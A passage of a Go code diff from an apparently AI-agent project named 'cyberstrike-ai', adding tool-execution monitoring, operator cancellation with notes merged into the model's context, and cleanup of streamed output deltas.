if len(result.Content) > 0 {
|
||||
execution.Error = result.Content[0].Text
|
||||
} else {
|
||||
execution.Error = "工具执行返回错误结果"
|
||||
}
|
||||
execution.Result = result
|
||||
failed = true
|
||||
finalResult = result
|
||||
}
|
||||
execution.Result = result
|
||||
failed = true
|
||||
finalResult = result
|
||||
} else {
|
||||
execution.Status = "completed"
|
||||
if result == nil {
|
||||
@@ -832,6 +920,49 @@ func (s *Server) CallTool(ctx context.Context, toolName string, args map[string]
|
||||
return finalResult, executionID, nil
|
||||
}
|
||||
|
||||
// RecordCompletedToolInvocation 将已在其它路径完成的工具调用写入监控存储(格式与 CallTool 结束后一致),
|
||||
// 用于 Eino ADK filesystem execute 等未经过 CallTool 的场景;返回 executionId 供助手消息 mcpExecutionIds 关联。
|
||||
func (s *Server) RecordCompletedToolInvocation(toolName string, args map[string]interface{}, resultText string, invokeErr error) string {
|
||||
if s == nil {
|
||||
return ""
|
||||
}
|
||||
if args == nil {
|
||||
args = map[string]interface{}{}
|
||||
}
|
||||
executionID := uuid.New().String()
|
||||
now := time.Now()
|
||||
failed := invokeErr != nil
|
||||
exec := &ToolExecution{
|
||||
ID: executionID,
|
||||
ToolName: toolName,
|
||||
Arguments: args,
|
||||
StartTime: now,
|
||||
EndTime: &now,
|
||||
Duration: 0,
|
||||
}
|
||||
if failed {
|
||||
exec.Status = "failed"
|
||||
exec.Error = invokeErr.Error()
|
||||
if strings.TrimSpace(resultText) != "" {
|
||||
exec.Result = &ToolResult{Content: []Content{{Type: "text", Text: resultText}}}
|
||||
}
|
||||
} else {
|
||||
exec.Status = "completed"
|
||||
text := resultText
|
||||
if strings.TrimSpace(text) == "" {
|
||||
text = "(无输出)"
|
||||
}
|
||||
exec.Result = &ToolResult{Content: []Content{{Type: "text", Text: text}}}
|
||||
}
|
||||
if s.storage != nil {
|
||||
if err := s.storage.SaveToolExecution(exec); err != nil {
|
||||
s.logger.Warn("RecordCompletedToolInvocation 保存失败", zap.Error(err))
|
||||
}
|
||||
}
|
||||
s.updateStats(toolName, failed)
|
||||
return executionID
|
||||
}
|
||||
|
||||
// cleanupOldExecutions 清理旧的执行记录,防止内存无限增长
|
||||
func (s *Server) cleanupOldExecutions() {
|
||||
if len(s.executions) <= s.maxExecutionsInMemory {
|
||||
@@ -869,6 +1000,88 @@ func (s *Server) cleanupOldExecutions() {
|
||||
)
|
||||
}
|
||||
|
||||
func (s *Server) registerRunningCancel(id string, cancel context.CancelFunc) {
|
||||
s.runningCancelsMu.Lock()
|
||||
s.runningCancels[id] = cancel
|
||||
s.runningCancelsMu.Unlock()
|
||||
}
|
||||
|
||||
func (s *Server) unregisterRunningCancel(id string) {
|
||||
s.runningCancelsMu.Lock()
|
||||
delete(s.runningCancels, id)
|
||||
s.runningCancelsMu.Unlock()
|
||||
}
|
||||
|
||||
func (s *Server) readAbortUserNote(id string) string {
|
||||
s.runningCancelsMu.Lock()
|
||||
defer s.runningCancelsMu.Unlock()
|
||||
if s.abortUserNotes == nil {
|
||||
return ""
|
||||
}
|
||||
return s.abortUserNotes[id]
|
||||
}
|
||||
|
||||
func (s *Server) takeAbortUserNote(id string) string {
|
||||
s.runningCancelsMu.Lock()
|
||||
defer s.runningCancelsMu.Unlock()
|
||||
if s.abortUserNotes == nil {
|
||||
return ""
|
||||
}
|
||||
n := s.abortUserNotes[id]
|
||||
delete(s.abortUserNotes, id)
|
||||
return n
|
||||
}
|
||||
|
||||
// applyAbortUserNoteToCancelledToolResult 监控页「终止并填写说明」时合并「工具已输出 + 用户说明」交给模型。
|
||||
// exec 等工具会把失败写在 *ToolResult 里并返回 err==nil,若仅在 err!=nil 时合并会漏掉说明,甚至误 clear 掉 note。
|
||||
func (s *Server) applyAbortUserNoteToCancelledToolResult(executionID string, result **ToolResult, err *error) (cancelledWithUserNote bool) {
|
||||
note := strings.TrimSpace(s.readAbortUserNote(executionID))
|
||||
if note == "" {
|
||||
return false
|
||||
}
|
||||
hasErr := err != nil && *err != nil
|
||||
hasRes := result != nil && *result != nil
|
||||
if !hasErr && !hasRes {
|
||||
return false
|
||||
}
|
||||
_ = s.takeAbortUserNote(executionID)
|
||||
partial := ""
|
||||
if hasRes {
|
||||
partial = ToolResultPlainText(*result)
|
||||
}
|
||||
if partial == "" && hasErr {
|
||||
partial = (*err).Error()
|
||||
}
|
||||
merged := MergePartialToolOutputAndAbortNote(partial, note)
|
||||
*err = nil
|
||||
*result = &ToolResult{Content: []Content{{Type: "text", Text: merged}}, IsError: true}
|
||||
return true
|
||||
}
|
||||
|
||||
// CancelToolExecutionWithNote 取消内部工具;note 非空时与工具已返回文本合并后交给上层模型。
|
||||
func (s *Server) CancelToolExecutionWithNote(id string, note string) bool {
|
||||
s.runningCancelsMu.Lock()
|
||||
cancel, ok := s.runningCancels[id]
|
||||
if !ok || cancel == nil {
|
||||
s.runningCancelsMu.Unlock()
|
||||
return false
|
||||
}
|
||||
if strings.TrimSpace(note) != "" {
|
||||
if s.abortUserNotes == nil {
|
||||
s.abortUserNotes = make(map[string]string)
|
||||
}
|
||||
s.abortUserNotes[id] = strings.TrimSpace(note)
|
||||
}
|
||||
s.runningCancelsMu.Unlock()
|
||||
cancel()
|
||||
return true
|
||||
}
|
||||
|
||||
// CancelToolExecution 取消正在执行的内部工具调用(无用户说明)。
|
||||
func (s *Server) CancelToolExecution(id string) bool {
|
||||
return s.CancelToolExecutionWithNote(id, "")
|
||||
}
|
||||
|
||||
// initDefaultPrompts 初始化默认提示词模板
|
||||
func (s *Server) initDefaultPrompts() {
|
||||
s.mu.Lock()
|
||||
|
||||
+35
-1
@@ -4,6 +4,7 @@ import (
|
||||
"context"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"strings"
|
||||
"time"
|
||||
)
|
||||
|
||||
@@ -192,7 +193,7 @@ type ToolExecution struct {
|
||||
ID string `json:"id"`
|
||||
ToolName string `json:"toolName"`
|
||||
Arguments map[string]interface{} `json:"arguments"`
|
||||
Status string `json:"status"` // pending, running, completed, failed
|
||||
Status string `json:"status"` // pending, running, completed, failed, cancelled
|
||||
Result *ToolResult `json:"result,omitempty"`
|
||||
Error string `json:"error,omitempty"`
|
||||
StartTime time.Time `json:"startTime"`
|
||||
@@ -293,3 +294,36 @@ type SamplingContent struct {
|
||||
Type string `json:"type"`
|
||||
Text string `json:"text,omitempty"`
|
||||
}
|
||||
|
||||
// ToolResultPlainText 拼接工具结果中的文本(手动终止时作为「工具原始输出」)。
|
||||
func ToolResultPlainText(r *ToolResult) string {
|
||||
if r == nil || len(r.Content) == 0 {
|
||||
return ""
|
||||
}
|
||||
var b strings.Builder
|
||||
for _, c := range r.Content {
|
||||
b.WriteString(c.Text)
|
||||
}
|
||||
return strings.TrimSpace(b.String())
|
||||
}
|
||||
|
||||
// AbortNoteBannerForModel 标出后续文本来自「用户手动终止工具时在弹窗中填写」,避免与 stdout/stderr 混淆。
|
||||
const AbortNoteBannerForModel = "---\n" +
|
||||
"【用户终止说明|USER INTERRUPT NOTE】\n" +
|
||||
"(以下由操作者填写,用于指示模型如何继续;不是工具原始输出。)\n" +
|
||||
"(Written by the operator when stopping this tool; not raw tool output.)\n" +
|
||||
"---"
|
||||
|
||||
// MergePartialToolOutputAndAbortNote 格式:工具原始输出 + 醒目标题 + 用户终止说明(无说明则原样返回 partial)。
|
||||
func MergePartialToolOutputAndAbortNote(partial, userNote string) string {
|
||||
partial = strings.TrimSpace(partial)
|
||||
userNote = strings.TrimSpace(userNote)
|
||||
if userNote == "" {
|
||||
return partial
|
||||
}
|
||||
section := AbortNoteBannerForModel + "\n" + userNote
|
||||
if partial == "" {
|
||||
return section
|
||||
}
|
||||
return partial + "\n\n" + section
|
||||
}
|
||||
|
||||
@@ -11,14 +11,46 @@ import (
|
||||
"strings"
|
||||
"sync"
|
||||
"sync/atomic"
|
||||
"unicode/utf8"
|
||||
|
||||
"cyberstrike-ai/internal/agent"
|
||||
"cyberstrike-ai/internal/config"
|
||||
"cyberstrike-ai/internal/einomcp"
|
||||
"cyberstrike-ai/internal/einoobserve"
|
||||
"cyberstrike-ai/internal/openai"
|
||||
|
||||
"github.com/cloudwego/eino/adk"
|
||||
"github.com/cloudwego/eino/schema"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// normalizeStreamingDelta 将可能是“累计片段”的 chunk 归一化为“纯增量”。
|
||||
// 一些模型/桥接层在流式过程中会重复发送已输出前缀,前端若直接 buffer+=chunk 会出现重复文本。
|
||||
//
|
||||
// 注意:与 internal/openai.normalizeStreamingDelta 保持一致。
|
||||
func normalizeStreamingDelta(current, incoming string) (next, delta string) {
|
||||
if incoming == "" {
|
||||
return current, ""
|
||||
}
|
||||
if current == "" {
|
||||
return incoming, incoming
|
||||
}
|
||||
if strings.HasPrefix(incoming, current) && len(incoming) > len(current) {
|
||||
return incoming, incoming[len(current):]
|
||||
}
|
||||
if incoming == current && utf8.RuneCountInString(current) > 1 {
|
||||
return current, ""
|
||||
}
|
||||
return current + incoming, incoming
|
||||
}
|
||||
|
||||
func isInterruptContinue(ctx context.Context) bool {
|
||||
if ctx == nil {
|
||||
return false
|
||||
}
|
||||
return errors.Is(context.Cause(ctx), ErrInterruptContinue)
|
||||
}
|
||||
|
||||
func isEinoIterationLimitError(err error) bool {
|
||||
if err == nil {
|
||||
return false
|
||||
@@ -49,10 +81,25 @@ type einoADKRunLoopArgs struct {
|
||||
McpIDsMu *sync.Mutex
|
||||
McpIDs *[]string
|
||||
|
||||
// FilesystemMonitorAgent / FilesystemMonitorRecord 非 nil 时,将 Eino ADK filesystem 中间件工具(ls/read_file/write_file/edit_file/glob/grep)
|
||||
// 在完成时写入 MCP 监控;execute 仍由 eino_execute_monitor 记录,此处跳过。
|
||||
FilesystemMonitorAgent *agent.Agent
|
||||
FilesystemMonitorRecord einomcp.ExecutionRecorder
|
||||
|
||||
// ToolInvokeNotify 与 einomcp.ToolsFromDefinitions 共享:run loop 在迭代前 Set,MCP 桥 Fire 以补全 tool_result。
|
||||
ToolInvokeNotify *einomcp.ToolInvokeNotifyHolder
|
||||
|
||||
DA adk.Agent
|
||||
|
||||
// EmptyResponseMessage 当未捕获到助手正文时的占位(多代理与单代理文案不同)。
|
||||
EmptyResponseMessage string
|
||||
|
||||
// ModelFacingTrace 可选:由各 ChatModelAgent Handlers 链末尾中间件写入「即将送入模型」的消息快照;
|
||||
// 非空时优先用于 LastAgentTraceInput 序列化,使续跑与 summarization/reduction 后的上下文一致。
|
||||
ModelFacingTrace *modelFacingTraceHolder
|
||||
|
||||
// EinoCallbacks 可选:为 ADK Runner 注入 eino [callbacks] 全链路观测(见 internal/einoobserve)。
|
||||
EinoCallbacks *config.MultiAgentEinoCallbacksConfig
|
||||
}
|
||||
|
||||
func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs []adk.Message) (*RunResult, error) {
|
||||
@@ -190,6 +237,82 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
||||
pendingQueueByAgent = make(map[string][]string)
|
||||
}
|
||||
|
||||
// 最近一次成功的 Eino filesystem execute 的标准输出(trim):用于抑制模型紧接着复述同一字符串时的重复「助手输出」时间线。
|
||||
var executeStdoutDupMu sync.Mutex
|
||||
var pendingExecuteStdoutDup string
|
||||
recordPendingExecuteStdoutDup := func(toolName, stdout string, isErr bool) {
|
||||
if isErr || !strings.EqualFold(strings.TrimSpace(toolName), "execute") {
|
||||
return
|
||||
}
|
||||
t := strings.TrimSpace(stdout)
|
||||
if t == "" {
|
||||
return
|
||||
}
|
||||
executeStdoutDupMu.Lock()
|
||||
pendingExecuteStdoutDup = t
|
||||
executeStdoutDupMu.Unlock()
|
||||
}
|
||||
|
||||
var toolResultSent sync.Map // toolCallID -> struct{};与 ADK Tool 消息去重,避免 bridge 与事件流各推一次
|
||||
if args.ToolInvokeNotify != nil {
|
||||
args.ToolInvokeNotify.Set(func(toolCallID, toolName, einoAgent string, success bool, content string, invokeErr error) {
|
||||
tid := strings.TrimSpace(toolCallID)
|
||||
removePendingByID(tid)
|
||||
if tid == "" || progress == nil {
|
||||
return
|
||||
}
|
||||
if _, loaded := toolResultSent.LoadOrStore(tid, struct{}{}); loaded {
|
||||
return
|
||||
}
|
||||
isErr := !success || invokeErr != nil
|
||||
body := content
|
||||
if invokeErr != nil {
|
||||
// 保留已流式累计的 stdout(如 execute 超时前的一半输出),避免 tool_result 只剩错误串、模型与 UI 丢失上下文
|
||||
tail := friendlyEinoExecuteInvokeTail(invokeErr)
|
||||
// execute 流式包装可能已把超时句写入 content(供 ADK tool 与流式 delta);勿重复拼接
|
||||
if tail != "" && strings.Contains(content, tail) {
|
||||
body = content
|
||||
} else if strings.TrimSpace(content) != "" {
|
||||
body = strings.TrimRight(content, "\n") + "\n\n" + tail
|
||||
} else {
|
||||
body = tail
|
||||
}
|
||||
isErr = true
|
||||
}
|
||||
recordPendingExecuteStdoutDup(toolName, body, isErr)
|
||||
preview := body
|
||||
if len(preview) > 200 {
|
||||
preview = preview[:200] + "..."
|
||||
}
|
||||
agentTag := strings.TrimSpace(einoAgent)
|
||||
if agentTag == "" {
|
||||
agentTag = orchestratorName
|
||||
}
|
||||
progress("tool_result", fmt.Sprintf("工具结果 (%s)", toolName), map[string]interface{}{
|
||||
"toolName": toolName,
|
||||
"success": !isErr,
|
||||
"isError": isErr,
|
||||
"result": body,
|
||||
"resultPreview": preview,
|
||||
"toolCallId": tid,
|
||||
"conversationId": conversationID,
|
||||
"einoAgent": agentTag,
|
||||
"einoRole": einoRoleTag(agentTag),
|
||||
"source": "eino",
|
||||
})
|
||||
})
|
||||
}
|
||||
|
||||
if args.EinoCallbacks != nil {
|
||||
ctx = einoobserve.AttachAgentRunCallbacks(ctx, args.EinoCallbacks, einoobserve.Params{
|
||||
Logger: logger,
|
||||
Progress: progress,
|
||||
ConversationID: conversationID,
|
||||
OrchMode: orchMode,
|
||||
OrchestratorName: orchestratorName,
|
||||
})
|
||||
}
|
||||
|
||||
runnerCfg := adk.RunnerConfig{
|
||||
Agent: da,
|
||||
EnableStreaming: true,
|
||||
@@ -318,7 +441,8 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
||||
}
|
||||
ids := snapshotMCPIDs()
|
||||
return buildEinoRunResultFromAccumulated(
|
||||
orchMode, runAccumulatedMsgs, lastAssistant, lastPlanExecuteExecutor, emptyHint, ids, true,
|
||||
orchMode, runAccumulatedMsgs, persistTraceSource(args, runAccumulatedMsgs),
|
||||
lastAssistant, lastPlanExecuteExecutor, emptyHint, ids, true,
|
||||
), runErr
|
||||
}
|
||||
|
||||
@@ -328,10 +452,18 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
||||
case <-ctx.Done():
|
||||
flushAllPendingAsFailed(ctx.Err())
|
||||
if progress != nil {
|
||||
progress("error", "Request cancelled / 请求已取消", map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"source": "eino",
|
||||
})
|
||||
if isInterruptContinue(ctx) {
|
||||
progress("progress", "已暂停当前输出,正在合并用户补充并继续…", map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"source": "eino",
|
||||
"kind": "interrupt_continue",
|
||||
})
|
||||
} else {
|
||||
progress("error", "Request cancelled / 请求已取消", map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"source": "eino",
|
||||
})
|
||||
}
|
||||
}
|
||||
return takePartial(ctx.Err())
|
||||
default:
|
||||
@@ -345,10 +477,18 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
||||
if ctxErr := ctx.Err(); ctxErr != nil {
|
||||
flushAllPendingAsFailed(ctxErr)
|
||||
if progress != nil {
|
||||
progress("error", ctxErr.Error(), map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"source": "eino",
|
||||
})
|
||||
if isInterruptContinue(ctx) {
|
||||
progress("progress", "已暂停当前输出,正在合并用户补充并继续…", map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"source": "eino",
|
||||
"kind": "interrupt_continue",
|
||||
})
|
||||
} else {
|
||||
progress("error", ctxErr.Error(), map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"source": "eino",
|
||||
})
|
||||
}
|
||||
}
|
||||
return takePartial(ctxErr)
|
||||
}
|
||||
@@ -430,46 +570,162 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
||||
streamHeaderSent := false
|
||||
var reasoningStreamID string
|
||||
var toolStreamFragments []schema.ToolCall
|
||||
var subAssistantBuf strings.Builder
|
||||
var subAssistantBuf string
|
||||
var subReplyStreamID string
|
||||
var mainAssistantBuf strings.Builder
|
||||
var mainAssistantBuf string
|
||||
var mainAssistDupTarget string // 非空表示本段主助手流需缓冲至 EOF,与 execute 输出比对去重
|
||||
var reasoningBuf string
|
||||
var prevReasoningDisplay string // UI 用:剥离 Claude 内部 signature 尾缀后的累计展示
|
||||
var streamRecvErr error
|
||||
type streamMsg struct {
|
||||
chunk *schema.Message
|
||||
err error
|
||||
}
|
||||
recvCh := make(chan streamMsg, 8)
|
||||
go func() {
|
||||
defer close(recvCh)
|
||||
for {
|
||||
ch, rerr := mv.MessageStream.Recv()
|
||||
recvCh <- streamMsg{chunk: ch, err: rerr}
|
||||
if rerr != nil {
|
||||
return
|
||||
}
|
||||
}
|
||||
}()
|
||||
streamRecvLoop:
|
||||
for {
|
||||
chunk, rerr := mv.MessageStream.Recv()
|
||||
if rerr != nil {
|
||||
if errors.Is(rerr, io.EOF) {
|
||||
break
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
streamRecvErr = ctx.Err()
|
||||
break streamRecvLoop
|
||||
case sm, ok := <-recvCh:
|
||||
if !ok {
|
||||
break streamRecvLoop
|
||||
}
|
||||
if logger != nil {
|
||||
logger.Warn("eino stream recv error, flushing incomplete stream",
|
||||
zap.Error(rerr),
|
||||
zap.String("agent", ev.AgentName),
|
||||
zap.Int("toolFragments", len(toolStreamFragments)))
|
||||
chunk, rerr := sm.chunk, sm.err
|
||||
if rerr != nil {
|
||||
if errors.Is(rerr, io.EOF) {
|
||||
break streamRecvLoop
|
||||
}
|
||||
if logger != nil {
|
||||
logger.Warn("eino stream recv error, flushing incomplete stream",
|
||||
zap.Error(rerr),
|
||||
zap.String("agent", ev.AgentName),
|
||||
zap.Int("toolFragments", len(toolStreamFragments)))
|
||||
}
|
||||
streamRecvErr = rerr
|
||||
break streamRecvLoop
|
||||
}
|
||||
streamRecvErr = rerr
|
||||
break
|
||||
}
|
||||
if chunk == nil {
|
||||
continue
|
||||
}
|
||||
if progress != nil && strings.TrimSpace(chunk.ReasoningContent) != "" {
|
||||
if reasoningStreamID == "" {
|
||||
reasoningStreamID = fmt.Sprintf("eino-reasoning-%s-%d", conversationID, atomic.AddInt64(&reasoningStreamSeq, 1))
|
||||
progress("thinking_stream_start", " ", map[string]interface{}{
|
||||
"streamId": reasoningStreamID,
|
||||
"source": "eino",
|
||||
"einoAgent": ev.AgentName,
|
||||
"einoRole": einoRoleTag(ev.AgentName),
|
||||
"orchestration": orchMode,
|
||||
})
|
||||
if chunk == nil {
|
||||
continue
|
||||
}
|
||||
if progress != nil && strings.TrimSpace(chunk.ReasoningContent) != "" {
|
||||
var reasoningDelta string
|
||||
reasoningBuf, reasoningDelta = normalizeStreamingDelta(reasoningBuf, chunk.ReasoningContent)
|
||||
if reasoningDelta != "" {
|
||||
fullDisplay := openai.DisplayReasoningContent(reasoningBuf)
|
||||
var displayDelta string
|
||||
if strings.HasPrefix(fullDisplay, prevReasoningDisplay) {
|
||||
displayDelta = fullDisplay[len(prevReasoningDisplay):]
|
||||
} else {
|
||||
displayDelta = fullDisplay
|
||||
}
|
||||
prevReasoningDisplay = fullDisplay
|
||||
if displayDelta != "" {
|
||||
if reasoningStreamID == "" {
|
||||
reasoningStreamID = fmt.Sprintf("eino-reasoning-%s-%d", conversationID, atomic.AddInt64(&reasoningStreamSeq, 1))
|
||||
progress("reasoning_chain_stream_start", " ", map[string]interface{}{
|
||||
"streamId": reasoningStreamID,
|
||||
"source": "eino",
|
||||
"einoAgent": ev.AgentName,
|
||||
"einoRole": einoRoleTag(ev.AgentName),
|
||||
"orchestration": orchMode,
|
||||
})
|
||||
}
|
||||
progress("reasoning_chain_stream_delta", displayDelta, map[string]interface{}{
|
||||
"streamId": reasoningStreamID,
|
||||
})
|
||||
}
|
||||
}
|
||||
}
|
||||
if chunk.Content != "" {
|
||||
if progress != nil && streamsMainAssistant(ev.AgentName) {
|
||||
var contentDelta string
|
||||
mainAssistantBuf, contentDelta = normalizeStreamingDelta(mainAssistantBuf, chunk.Content)
|
||||
if contentDelta != "" {
|
||||
if mainAssistDupTarget == "" {
|
||||
executeStdoutDupMu.Lock()
|
||||
if pendingExecuteStdoutDup != "" {
|
||||
mainAssistDupTarget = pendingExecuteStdoutDup
|
||||
}
|
||||
executeStdoutDupMu.Unlock()
|
||||
}
|
||||
if mainAssistDupTarget != "" {
|
||||
// 已展示过 tool_result,缓冲全文;EOF 后与 execute 输出相同则不再发助手流
|
||||
} else {
|
||||
if !streamHeaderSent {
|
||||
progress("response_start", "", map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"mcpExecutionIds": snapshotMCPIDs(),
|
||||
"messageGeneratedBy": "eino:" + ev.AgentName,
|
||||
"einoRole": "orchestrator",
|
||||
"einoAgent": ev.AgentName,
|
||||
"orchestration": orchMode,
|
||||
})
|
||||
streamHeaderSent = true
|
||||
}
|
||||
progress("response_delta", contentDelta, map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"mcpExecutionIds": snapshotMCPIDs(),
|
||||
"einoRole": "orchestrator",
|
||||
"einoAgent": ev.AgentName,
|
||||
"orchestration": orchMode,
|
||||
})
|
||||
}
|
||||
}
|
||||
} else if !streamsMainAssistant(ev.AgentName) {
|
||||
var subDelta string
|
||||
subAssistantBuf, subDelta = normalizeStreamingDelta(subAssistantBuf, chunk.Content)
|
||||
if subDelta != "" {
|
||||
if progress != nil {
|
||||
if subReplyStreamID == "" {
|
||||
subReplyStreamID = fmt.Sprintf("eino-sub-reply-%s-%d", conversationID, atomic.AddInt64(&einoSubReplyStreamSeq, 1))
|
||||
progress("eino_agent_reply_stream_start", "", map[string]interface{}{
|
||||
"streamId": subReplyStreamID,
|
||||
"einoAgent": ev.AgentName,
|
||||
"einoRole": "sub",
|
||||
"conversationId": conversationID,
|
||||
"source": "eino",
|
||||
})
|
||||
}
|
||||
progress("eino_agent_reply_stream_delta", subDelta, map[string]interface{}{
|
||||
"streamId": subReplyStreamID,
|
||||
"conversationId": conversationID,
|
||||
})
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
if len(chunk.ToolCalls) > 0 {
|
||||
toolStreamFragments = append(toolStreamFragments, chunk.ToolCalls...)
|
||||
}
|
||||
progress("thinking_stream_delta", chunk.ReasoningContent, map[string]interface{}{
|
||||
"streamId": reasoningStreamID,
|
||||
})
|
||||
}
|
||||
if chunk.Content != "" {
|
||||
if progress != nil && streamsMainAssistant(ev.AgentName) {
|
||||
if !streamHeaderSent {
|
||||
}
|
||||
if streamsMainAssistant(ev.AgentName) {
|
||||
s := strings.TrimSpace(mainAssistantBuf)
|
||||
if mainAssistDupTarget != "" {
|
||||
executeStdoutDupMu.Lock()
|
||||
pendingExecuteStdoutDup = ""
|
||||
executeStdoutDupMu.Unlock()
|
||||
if s != "" && s == mainAssistDupTarget {
|
||||
// 与刚展示的 execute 结果完全一致:不再发助手流式事件,仍写入轨迹与最终回复字段
|
||||
lastAssistant = s
|
||||
runAccumulatedMsgs = append(runAccumulatedMsgs, schema.AssistantMessage(s, nil))
|
||||
if orchMode == "plan_execute" && strings.EqualFold(strings.TrimSpace(ev.AgentName), "executor") {
|
||||
lastPlanExecuteExecutor = UnwrapPlanExecuteUserText(s)
|
||||
}
|
||||
} else if s != "" {
|
||||
if progress != nil {
|
||||
progress("response_start", "", map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"mcpExecutionIds": snapshotMCPIDs(),
|
||||
@@ -478,42 +734,21 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
||||
"einoAgent": ev.AgentName,
|
||||
"orchestration": orchMode,
|
||||
})
|
||||
streamHeaderSent = true
|
||||
}
|
||||
progress("response_delta", chunk.Content, map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"mcpExecutionIds": snapshotMCPIDs(),
|
||||
"einoRole": "orchestrator",
|
||||
"einoAgent": ev.AgentName,
|
||||
"orchestration": orchMode,
|
||||
})
|
||||
mainAssistantBuf.WriteString(chunk.Content)
|
||||
} else if !streamsMainAssistant(ev.AgentName) {
|
||||
if progress != nil {
|
||||
if subReplyStreamID == "" {
|
||||
subReplyStreamID = fmt.Sprintf("eino-sub-reply-%s-%d", conversationID, atomic.AddInt64(&einoSubReplyStreamSeq, 1))
|
||||
progress("eino_agent_reply_stream_start", "", map[string]interface{}{
|
||||
"streamId": subReplyStreamID,
|
||||
"einoAgent": ev.AgentName,
|
||||
"einoRole": "sub",
|
||||
"conversationId": conversationID,
|
||||
"source": "eino",
|
||||
})
|
||||
}
|
||||
progress("eino_agent_reply_stream_delta", chunk.Content, map[string]interface{}{
|
||||
"streamId": subReplyStreamID,
|
||||
"conversationId": conversationID,
|
||||
progress("response_delta", s, map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"mcpExecutionIds": snapshotMCPIDs(),
|
||||
"einoRole": "orchestrator",
|
||||
"einoAgent": ev.AgentName,
|
||||
"orchestration": orchMode,
|
||||
})
|
||||
}
|
||||
subAssistantBuf.WriteString(chunk.Content)
|
||||
lastAssistant = s
|
||||
runAccumulatedMsgs = append(runAccumulatedMsgs, schema.AssistantMessage(s, nil))
|
||||
if orchMode == "plan_execute" && strings.EqualFold(strings.TrimSpace(ev.AgentName), "executor") {
|
||||
lastPlanExecuteExecutor = UnwrapPlanExecuteUserText(s)
|
||||
}
|
||||
}
|
||||
}
|
||||
if len(chunk.ToolCalls) > 0 {
|
||||
toolStreamFragments = append(toolStreamFragments, chunk.ToolCalls...)
|
||||
}
|
||||
}
|
||||
if streamsMainAssistant(ev.AgentName) {
|
||||
if s := strings.TrimSpace(mainAssistantBuf.String()); s != "" {
|
||||
} else if s != "" {
|
||||
lastAssistant = s
|
||||
runAccumulatedMsgs = append(runAccumulatedMsgs, schema.AssistantMessage(s, nil))
|
||||
if orchMode == "plan_execute" && strings.EqualFold(strings.TrimSpace(ev.AgentName), "executor") {
|
||||
@@ -521,8 +756,8 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
||||
}
|
||||
}
|
||||
}
|
||||
if subAssistantBuf.Len() > 0 && progress != nil {
|
||||
if s := strings.TrimSpace(subAssistantBuf.String()); s != "" {
|
||||
if strings.TrimSpace(subAssistantBuf) != "" && progress != nil {
|
||||
if s := strings.TrimSpace(subAssistantBuf); s != "" {
|
||||
if subReplyStreamID != "" {
|
||||
progress("eino_agent_reply_stream_end", s, map[string]interface{}{
|
||||
"streamId": subReplyStreamID,
|
||||
@@ -543,10 +778,17 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
||||
}
|
||||
var lastToolChunk *schema.Message
|
||||
if merged := mergeStreamingToolCallFragments(toolStreamFragments); len(merged) > 0 {
|
||||
lastToolChunk = &schema.Message{ToolCalls: merged}
|
||||
lastToolChunk = mergeMessageToolCalls(&schema.Message{ToolCalls: merged})
|
||||
}
|
||||
tryEmitToolCallsOnce(lastToolChunk, ev.AgentName, orchestratorName, conversationID, progress, toolEmitSeen, subAgentToolStep, markPending)
|
||||
// 流式路径此前只把 tool_calls 推给进度 UI,未写入 runAccumulatedMsgs;落库后 loadHistory→RepairOrphan 会删掉全部 tool 结果,表现为「续跑/下轮失忆」。
|
||||
if lastToolChunk != nil && len(lastToolChunk.ToolCalls) > 0 {
|
||||
runAccumulatedMsgs = append(runAccumulatedMsgs, schema.AssistantMessage("", lastToolChunk.ToolCalls))
|
||||
}
|
||||
if streamRecvErr != nil {
|
||||
if isInterruptContinue(ctx) {
|
||||
return takePartial(streamRecvErr)
|
||||
}
|
||||
if progress != nil {
|
||||
progress("eino_stream_error", streamRecvErr.Error(), map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
@@ -571,7 +813,7 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
||||
|
||||
if mv.Role == schema.Assistant {
|
||||
if progress != nil && strings.TrimSpace(msg.ReasoningContent) != "" {
|
||||
progress("thinking", strings.TrimSpace(msg.ReasoningContent), map[string]interface{}{
|
||||
progress("reasoning_chain", openai.DisplayReasoningContent(strings.TrimSpace(msg.ReasoningContent)), map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"source": "eino",
|
||||
"einoAgent": ev.AgentName,
|
||||
@@ -582,26 +824,42 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
||||
body := strings.TrimSpace(msg.Content)
|
||||
if body != "" {
|
||||
if streamsMainAssistant(ev.AgentName) {
|
||||
if progress != nil {
|
||||
progress("response_start", "", map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"mcpExecutionIds": snapshotMCPIDs(),
|
||||
"messageGeneratedBy": "eino:" + ev.AgentName,
|
||||
"einoRole": "orchestrator",
|
||||
"einoAgent": ev.AgentName,
|
||||
"orchestration": orchMode,
|
||||
})
|
||||
